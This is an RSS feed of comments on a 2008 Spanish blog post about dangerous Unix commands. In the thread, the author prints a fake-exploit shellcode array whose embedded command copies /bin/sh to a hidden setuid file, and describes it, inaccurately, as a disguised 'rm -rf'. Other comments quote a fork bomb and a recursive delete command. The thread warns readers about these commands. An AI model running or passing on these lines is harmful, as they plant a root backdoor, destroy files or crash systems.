<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
		>
<channel>
	<title>Comentarios en: Comandos peligrosos</title>
	<atom:link href="http://thesicksadworld.wordpress.com/2008/11/10/comandos-peligrosos/feed/" rel="self" type="application/rss+xml" />
	<link>http://thesicksadworld.wordpress.com/2008/11/10/comandos-peligrosos/</link>
	<description>El mundo enfermo.</description>
	<lastBuildDate>Sun, 23 Aug 2009 21:21:31 +0000</lastBuildDate>
	<generator>http://wordpress.com/</generator>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
		<item>
		<title>Por: Nico</title>
		<link>http://thesicksadworld.wordpress.com/2008/11/10/comandos-peligrosos/#comment-25</link>
		<dc:creator>Nico</dc:creator>
		<pubDate>Wed, 12 Nov 2008 09:02:11 +0000</pubDate>
		<guid isPermaLink="false">http://thesicksadworld.wordpress.com/?p=177#comment-25</guid>
		<description>Raramente corro un comando tan largo antes de analizarlo,pero està verdaderamente simpatico.Saludos.</description>
		<content:encoded><![CDATA[<p>Raramente corro un comando tan largo antes de analizarlo,pero està verdaderamente simpatico.Saludos.</p>
]]></content:encoded>
	</item>
	<item>
		<title>Por: thesicksadworld</title>
		<link>http://thesicksadworld.wordpress.com/2008/11/10/comandos-peligrosos/#comment-24</link>
		<dc:creator>thesicksadworld</dc:creator>
		<pubDate>Wed, 12 Nov 2008 07:32:01 +0000</pubDate>
		<guid isPermaLink="false">http://thesicksadworld.wordpress.com/?p=177#comment-24</guid>
		<description>Sí, la verdad es que no los puse porque me dio flojera ver qué hacían, pero también vi uno que este que es muy largo:

char esp[] __attribute__ ((section(”.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”; 

y es un rm -rf ~ / &amp;  disfrazado de código hexadecimal,  si hasta da risa jeje.</description>
		<content:encoded><![CDATA[<p>Sí, la verdad es que no los puse porque me dio flojera ver qué hacían, pero también vi uno que este que es muy largo:</p>
<p>char esp[] __attribute__ ((section(”.text”))) /* e.s.p<br />
release */<br />
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″<br />
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″<br />
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″<br />
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″<br />
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″<br />
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″<br />
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″<br />
“cp -p /bin/sh /tmp/.beyond; chmod 4755<br />
/tmp/.beyond;”; </p>
<p>y es un rm -rf ~ / &amp;  disfrazado de código hexadecimal,  si hasta da risa jeje.</p>
]]></content:encoded>
	</item>
	<item>
		<title>Por: Nico</title>
		<link>http://thesicksadworld.wordpress.com/2008/11/10/comandos-peligrosos/#comment-23</link>
		<dc:creator>Nico</dc:creator>
		<pubDate>Tue, 11 Nov 2008 09:58:54 +0000</pubDate>
		<guid isPermaLink="false">http://thesicksadworld.wordpress.com/?p=177#comment-23</guid>
		<description>El ultimo de la lista,no es tan peligroso,es solo una B.fork como esta [$0 &amp; $0 &amp;] entre otras,nada como para pegarse un tiro,aqui tienes + info http://phyx.wordpress.com/2008/08/21/bombas-fork-en-linux-comandos-peligrosos-2/ .Por otro lado,faltan mas comandos en la lista que podrìas agregar como buena informacion por ej: fork while fork (en perl) - find ./ * -exec rm { } \; -etc,etc.. aqui tienes + info http://phyx.wordpress.com/2008/07/14/comandos-peligrosos-mirar-pero-no-los-ejecutar/ ,entre otros que puedes rastrear x la red.
Salu2</description>
		<content:encoded><![CDATA[<p>El ultimo de la lista,no es tan peligroso,es solo una B.fork como esta [$0 &amp; $0 &amp;] entre otras,nada como para pegarse un tiro,aqui tienes + info <a href="http://phyx.wordpress.com/2008/08/21/bombas-fork-en-linux-comandos-peligrosos-2/" rel="nofollow">http://phyx.wordpress.com/2008/08/21/bombas-fork-en-linux-comandos-peligrosos-2/</a> .Por otro lado,faltan mas comandos en la lista que podrìas agregar como buena informacion por ej: fork while fork (en perl) &#8211; find ./ * -exec rm { } \; -etc,etc.. aqui tienes + info <a href="http://phyx.wordpress.com/2008/07/14/comandos-peligrosos-mirar-pero-no-los-ejecutar/" rel="nofollow">http://phyx.wordpress.com/2008/07/14/comandos-peligrosos-mirar-pero-no-los-ejecutar/</a> ,entre otros que puedes rastrear x la red.<br />
Salu2</p>
]]></content:encoded>
	</item>
</channel>
</rss>
